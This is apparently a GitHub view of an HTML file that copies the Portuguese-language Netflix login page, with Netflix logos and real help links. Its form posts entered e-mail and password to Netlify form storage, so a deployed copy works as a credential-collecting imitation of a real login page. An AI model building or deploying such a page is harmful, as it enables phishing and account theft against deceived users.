-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
65 lines (55 loc) · 2.42 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="css/style.css">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Netflix Ching Ling</title>
<link rel="icon" type="iconSite" href="img/N-title.png">
</head>
<body>
<header>
<a href="index.html"><img src="img/NF_logo.png" alt="NetflixLogo" id="headerLogo"></a>
</header>
<div id="loginArea">
<h3>Entrar</h3>
<form name="loginNF" method="POST" data-netlify="true">
<ul id="InputHome">
<li><input id="inputLogin" type="email" name="email" placeholder="E-mail"></li><br>
<li><input id="inputLogin" type="password" name="email" placeholder="Senha"></li><br>
<li><button type="submit" id="enterLogin">Entrar</button></li>
</ul>
</form>
<div id="helpLinks">
<ul >
<li><input type="checkbox" checked><label>Lembre-se de mim</label></li>
<li><a href="https://www.netflix.com/br/LoginHelp">Precisa de ajuda?</a></li>
</ul>
</div>
<div id="novoLogin">
<ul>
<li><p><img src="img/FBlogo.png" alt="facebookLogo"> Conectar com Facebook</p></li>
<li><p>Novo por aqui? <a href="">Assine agora</a></li></p>
</ul>
</div>
<div id="infoCaptcha">
<p>Esta página é protegida pelo Google reCAPTCHA para garantir que você não é um robô <a href="">Saiba mais</a></p>
</div>
</div>
<footer>
<p>Dúvidas? Ligue <a href="tel:0800-761-4631">0800-761-4631</a></p>
<ul>
<li><a href="https://help.netflix.com/support/412">Perguntas frequentes</a></li>
<li><a href="https://help.netflix.com/">Centro de ajuda</a></li>
<li><a href="https://help.netflix.com/legal/termsofuse">Termos de uso</a></li>
<li><a href="https://help.netflix.com/legal/privacy">Privacidade</a></li>
<li><a href="https://help.netflix.com/legal/privacy#cookies">Preferências de cookies</a></li>
<li><a href="https://help.netflix.com/legal/corpinfo">Informações corporativas</a></li>
</ul>
<select id="langSelector">
<option value="PTBR">Português</option>
<option value="EN">English</option>
</select>
</footer>
</body>
</html>